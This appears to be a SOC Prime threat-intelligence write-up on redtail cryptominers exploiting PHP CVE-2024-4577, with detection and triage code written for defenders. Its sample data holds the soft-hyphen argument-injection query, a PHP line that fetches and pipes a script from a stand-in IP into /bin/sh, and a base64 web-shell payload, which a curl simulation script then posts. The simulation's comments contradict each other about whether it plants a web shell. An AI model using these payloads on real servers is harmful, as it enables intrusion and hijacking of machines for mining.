SOC Prime Bias: Critical

30 Apr 2026 17:12

Libredtail Exploits CVE-2024-4577 for Cryptomining

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The article details a cryptomining campaign involving the redtail malware family, delivered through HTTP requests that exploit CVE-2024-4577, an argument-injection flaw in PHP's CGI mode. Threat actors send Base64-encoded payloads that retrieve and run a self-replicating script named cve_2024_4577.selfrep. The activity targets vulnerable web servers and is paired with follow-on SSH login attempts that rely on default credentials to expand access.

Investigation

The researcher observed several IP addresses from Germany, the United Kingdom, and India sending a sequence of four HTTP POST requests that reference /bin/sh, use wget or curl to download a shell script, and trigger the CVE-2024-4577 exploit. When successful, the attack drops a hidden .redtail binary and kills competing cryptomining processes already running on the host. The investigation also recorded SSH login attempts with credentials such as admin/admin, along with SYN scanning activity.

Mitigation

Organizations should update PHP to a release that addresses CVE-2024-4577 (8.3.8, 8.2.20 or 8.1.29 and later). The flaw itself only affects PHP running in CGI mode on Windows, but the exploit attempts are sprayed indiscriminately, so the request pattern is worth alerting on whatever the platform. Block the libredtail-http user agent at the perimeter and deploy WAF rules that deny the known exploit payload pattern: the injected -d allow_url_include and auto_prepend_file=php://input directives, whose leading hyphen is typically sent as a soft hyphen (%AD) so that it survives URL decoding. A rule that simply denies any request containing /sh is too broad (it also matches /shop, /share and similar paths); match the full /bin/sh string instead. SSH access should be hardened by enforcing key-based authentication and disabling default or weak credentials. Monitoring for suspicious outbound traffic to unknown IP addresses is also recommended.
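As an added example (not SOC Prime's detection content or the researcher's tooling), the following Python classifier applies the indicators above to request records of the shape a WAF or reverse-proxy log would supply. It decodes the query string to bytes before matching so the soft-hyphen form of the CVE-2024-4577 argument injection is caught, and it matches the full /bin/sh string rather than a bare /sh. The record layout, the field names and the three sample requests are constructed for the example.

```python
"""Classify HTTP requests against the redtail / CVE-2024-4577 indicators from the
write-up. Added example, not SOC Prime's content; sample requests are constructed."""
import base64
import re
import urllib.parse

REDTAIL_UA = "libredtail-http"            # user-agent named in the write-up
SELFREP_MARKER = "cve_2024_4577.selfrep"  # self-replicating script from the write-up

# CVE-2024-4577 smuggles PHP CGI "-d <directive>" arguments through the query string;
# the "-" is sent as a soft hyphen (U+00AD, %AD) that Windows best-fit mapping turns
# into a real hyphen, so the decoded query reads "-d allow_url_include=1 ...".
DIRECTIVE_RE = re.compile(r"-d\s*(allow_url_include|auto_prepend_file)\b", re.I)
DIRECTIVE_NAME_RE = re.compile(r"\b(allow_url_include|auto_prepend_file)\b", re.I)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
STRONG = {"redtail_user_agent", "cve_2024_4577_directive_injection",
          "selfrep_marker", "base64_php_payload"}


def decode_query(raw: str) -> str:
    """Percent-decode to bytes so %AD survives, then fold the soft hyphen to '-'."""
    data = urllib.parse.unquote_to_bytes(raw.replace("+", " "))
    return data.replace(b"\xad", b"-").decode("latin-1")


def base64_php(text: str) -> bool:
    """True if any base64-looking token in text decodes to something containing '<?php'."""
    for token in B64_TOKEN_RE.findall(text):
        try:
            if b"<?php" in base64.b64decode(token, validate=True):
                return True
        except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
            pass
    return False


def classify(req: dict) -> list:
    """Return the indicator names found in one request record; [] means nothing matched.

    Record keys (assumed shape, as a WAF or reverse-proxy log would supply them):
    path, query (raw, still percent-encoded), user_agent, body.
    """
    hits = []
    query = decode_query(req.get("query", ""))
    body = urllib.parse.unquote(req.get("body", ""))
    text = " ".join((req.get("path", ""), query, body))
    if req.get("user_agent", "").lower() == REDTAIL_UA:
        hits.append("redtail_user_agent")
    if DIRECTIVE_RE.search(query):
        hits.append("cve_2024_4577_directive_injection")   # the real exploit shape
    elif DIRECTIVE_NAME_RE.search(query):
        hits.append("php_directive_in_query")              # directive name without the -d
    # Match the full /bin/sh, not the bare "/sh" of a naive WAF rule: /shop, /share ... must not trip it.
    if "/bin/sh" in text:
        hits.append("bin_sh_reference")
    if SELFREP_MARKER in text:
        hits.append("selfrep_marker")
    if base64_php(body):
        hits.append("base64_php_payload")
    return hits


def is_malicious(req: dict) -> bool:
    """One strong indicator is enough to block or alert; the weaker ones add context."""
    return bool(STRONG & set(classify(req)))


# Constructed sample records (not captured traffic).
SAMPLE_REQUESTS = {
    "exploit": {  # classic CVE-2024-4577 shape aimed at the CGI handler
        "path": "/cgi-bin/php-cgi",
        "query": "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
        "user_agent": "Mozilla/5.0",
        "body": "<?php system('wget -qO- http://203.0.113.5/cve_2024_4577.selfrep | /bin/sh'); ?>",
    },
    "simulation": {  # the regression request from the Simulation Execution section
        "path": "/upload.php",
        "query": "dir=/bin/sh&allow_url_include=1",
        "user_agent": "libredtail-http",
        "body": "payload=" + base64.b64encode(b'<?php system($_GET["cmd"]); ?>').decode()
                + "&marker=cve_2024_4577.selfrep",
    },
    "benign": {  # ordinary traffic whose path contains "/sh"
        "path": "/shop/cart", "query": "item=42&sh=1", "user_agent": "Mozilla/5.0", "body": "",
    },
}

if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        print(f"{name:11s} malicious={is_malicious(req)!s:5s} {classify(req)}")
```

Body inspection needs a WAF or proxy log; a plain access log only carries the request line and user agent, in which case the user-agent and query-string checks are what remain. The base64 heuristic will also try session tokens and similar long alphanumeric runs, which is harmless because only a decode containing <?php counts.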

Response

When a detection fires, defenders should isolate the affected system, collect forensic artifacts such as the cve_2024_4577.selfrep script and the hidden .redtail binary (along with the process tree that spawned them), and remove any cron jobs or scheduled tasks the malware created. Security teams should then inventory PHP installations across the environment and apply the necessary patches. SSH logs should also be reviewed for credential abuse or unauthorized access, with particular attention to successful logins that follow failed attempts from the same source address.
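The host-side steps (collect the dropped artifacts, strip the malware's cron entries, review sshd logs) as an added example in Python, not part of the original page: the directory tree, crontab text and sshd lines it works on are constructed, and the list of default accounts it checks beyond admin is an assumption.

```python
"""Host-side triage helpers for the response steps above: find the dropped artifacts,
strip the malware's cron entries, and review sshd logs for guessed credentials.
Added example; the directory tree, crontab text and log lines are constructed."""
import os
import re
import tempfile
from collections import Counter

ARTIFACT_NAMES = (".redtail", "cve_2024_4577.selfrep")   # file names from the write-up
# Assumption: accounts commonly sprayed alongside admin/admin; extend from your own baseline.
DEFAULT_ACCOUNTS = {"admin", "root", "test", "user"}

SSH_FAIL_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
SSH_OK_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port")


def find_artifacts(root: str) -> list:
    """Walk root and return every path whose file name is a known redtail artifact."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        found.extend(os.path.join(dirpath, n) for n in files if n in ARTIFACT_NAMES)
    return sorted(found)


def split_crontab(text: str) -> tuple:
    """Return (kept, removed) crontab lines; removed = entries that reference an artifact.

    Save the original for evidence first, then write `kept` back with `crontab -`.
    """
    kept, removed = [], []
    for line in text.splitlines():
        (removed if any(n in line for n in ARTIFACT_NAMES) else kept).append(line)
    return kept, removed


def review_sshd(lines) -> tuple:
    """Count failed logins per (user, source) and flag accepted logins that either follow
    a failure from the same source or use a default account: likely guessed credentials."""
    failures = Counter()
    failed_from = set()
    suspicious = []
    for line in lines:
        m = SSH_FAIL_RE.search(line)
        if m:
            user, src = m.groups()
            failures[(user, src)] += 1
            failed_from.add(src)
            continue
        m = SSH_OK_RE.search(line)
        if m:
            user, src = m.groups()
            if src in failed_from or user in DEFAULT_ACCOUNTS:
                suspicious.append((user, src))
    return failures, suspicious


def demo_artifact_scan() -> list:
    """Build a throwaway tree (constructed, not a real host) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "var", "tmp"))
        for rel in ("var/tmp/.redtail", "var/tmp/cve_2024_4577.selfrep", "var/tmp/index.php"):
            open(os.path.join(root, *rel.split("/")), "w").close()
        return [os.path.relpath(p, root).replace(os.sep, "/") for p in find_artifacts(root)]


# Constructed samples
CRONTAB_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.redtail >/dev/null 2>&1
@reboot /bin/sh /var/tmp/cve_2024_4577.selfrep
"""
SSHD_SAMPLE = [
    "May  1 03:12:01 web01 sshd[2201]: Failed password for admin from 198.51.100.7 port 51322 ssh2",
    "May  1 03:12:04 web01 sshd[2201]: Failed password for invalid user test from 198.51.100.7 port 51322 ssh2",
    "May  1 03:12:09 web01 sshd[2203]: Accepted password for admin from 198.51.100.7 port 51330 ssh2",
    "May  1 08:00:12 web01 sshd[2310]: Accepted publickey for deploy from 192.0.2.10 port 40022 ssh2",
]

if __name__ == "__main__":
    print("artifacts:", demo_artifact_scan())
    kept, removed = split_crontab(CRONTAB_SAMPLE)
    print("cron entries removed:", removed)
    failures, suspicious = review_sshd(SSHD_SAMPLE)
    print("ssh failures:", dict(failures), "suspicious accepts:", suspicious)
```

On a real host run find_artifacts against / (or the mounted image), feed each user's `crontab -l` output and /etc/cron.d files through split_crontab, and point review_sshd at /var/log/auth.log or the journal export; the scan and the log parse are read-only, so they are safe to run before the system is imaged.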

Attack Flow

    graph TB
      %% Class definitions
      classDef technique fill:#99ccff
      %% Nodes – MITRE ATT&CK Techniques
      tech_exploit_app["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Adversaries may exploit a public-facing application to gain initial access."]
      class tech_exploit_app technique
      tech_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/><b>Description</b>: Adversary injects malicious content such as a PHP payload into a web application to achieve code execution."]
      class tech_content_injection technique
      tech_deobfuscate["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: Adversaries decode or deobfuscate data (e.g., Base64) to reveal commands or payloads."]
      class tech_deobfuscate technique
      tech_unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Adversaries use a Unix shell to execute commands such as wget, curl, or sh for downloading and running malicious code."]
      class tech_unix_shell technique
      tech_hidden_file["<b>Technique</b> – <b>T1564.001 Hidden Files and Directories</b><br/><b>Description</b>: Adversaries create hidden files or directories (e.g., .redtail) to conceal malicious artifacts."]
      class tech_hidden_file technique
      tech_compute_hijack["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/><b>Description</b>: Adversaries hijack system compute resources to perform unauthorized cryptomining."]
      class tech_compute_hijack technique
      tech_brute_force["<b>Technique</b> – <b>T1110.001 Password Guessing</b><br/><b>Description</b>: Adversaries attempt credential guessing (e.g., SSH admin/admin) to obtain valid credentials."]
      class tech_brute_force technique
      tech_network_discovery["<b>Technique</b> – <b>T1046 Network Service Discovery</b><br/><b>Description</b>: Adversaries perform scans (e.g., SYN scans) to discover active network services and open ports."]
      class tech_network_discovery technique
      tech_obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Adversaries encode or otherwise obfuscate files (e.g., Base64 encoded POST body) to evade detection."]
      class tech_obfuscate technique
      %% Connections showing attack flow
      tech_exploit_app -->|leads_to| tech_content_injection
      tech_content_injection -->|leads_to| tech_deobfuscate
      tech_deobfuscate -->|leads_to| tech_unix_shell
      tech_unix_shell -->|leads_to| tech_hidden_file
      tech_hidden_file -->|leads_to| tech_compute_hijack
      tech_exploit_app -->|also_triggers| tech_brute_force
      tech_brute_force -->|leads_to| tech_network_discovery
      tech_unix_shell -->|enables| tech_obfuscate

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a compromised web server and wants to establish persistence using the Libredtail-HTTP web shell. They craft a malicious HTTP POST that:

    1. Uses the distinctive libredtail-http user agent observed in the campaign.
    2. Includes a query string with /bin/sh to mark a command-execution request and the PHP directive allow_url_include=1, the directive that the CVE-2024-4577 argument injection sets through the CGI command line.
    3. Sends a base64-encoded payload in the request body containing the PHP code <?php system($_GET['cmd']); ?> (obfuscation, T1027).
    4. Sets a custom header Script-Execution: apache.selfrep, which the detection logic matches with script_execution|contains.

    On a vulnerable server, processing this request decodes the payload, writes a malicious PHP file to the webroot and later executes commands passed to /bin/sh, establishing an encrypted channel back to the attacker (T1573). The simulation reproduces only the telemetry of that request; it exploits nothing, so it needs a lab endpoint that accepts the POST.

  • Regression Test Script:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Libredtail-HTTP malicious request simulation
    # Reproduces the campaign's request telemetry only;
    # it does not exploit CVE-2024-4577 or drop a binary.
    # -------------------------------------------------
    set -euo pipefail
    TARGET="${1:-http://localhost/upload.php}"   # lab upload endpoint
    USER_AGENT="libredtail-http"
    # Base64-encode the web-shell text so the body matches the encoded-payload pattern
    MALICIOUS_PAYLOAD=$(printf '%s' '<?php system($_GET["cmd"]); ?>' | base64 | tr -d '\n')

    # --data-urlencode keeps the '+' and '=' of the base64 string intact in transit;
    # with plain --data the server would decode '+' as a space and corrupt the payload.
    curl -sS -X POST "${TARGET}?dir=/bin/sh&allow_url_include=1" \
         -H "User-Agent: ${USER_AGENT}" \
         -H "Script-Execution: apache.selfrep" \
         -H "Content-Type: application/x-www-form-urlencoded" \
         --data-urlencode "payload=${MALICIOUS_PAYLOAD}" \
         --data-urlencode "marker=cve_2024_4577.selfrep"
    # The request should create/overwrite a PHP web-shell on the lab server.

    Run the script on a machine that can reach the target web server. After execution, verify the alert fires in the SIEM.

  • Cleanup Commands:

    #!/usr/bin/env bash
    # Remove the PHP web-shell created by the test
    set -euo pipefail
    CLEANUP_TARGET="${1:-http://localhost/cleanup.php}"   # lab-only endpoint, see note below

    curl -sS -X POST "${CLEANUP_TARGET}" \
         -H "User-Agent: libredtail-http" \
         --data-urlencode "file=uploaded_shell.php"

    The cleanup endpoint is assumed to exist for test purposes; replace with appropriate file‑system removal commands if you have direct host access.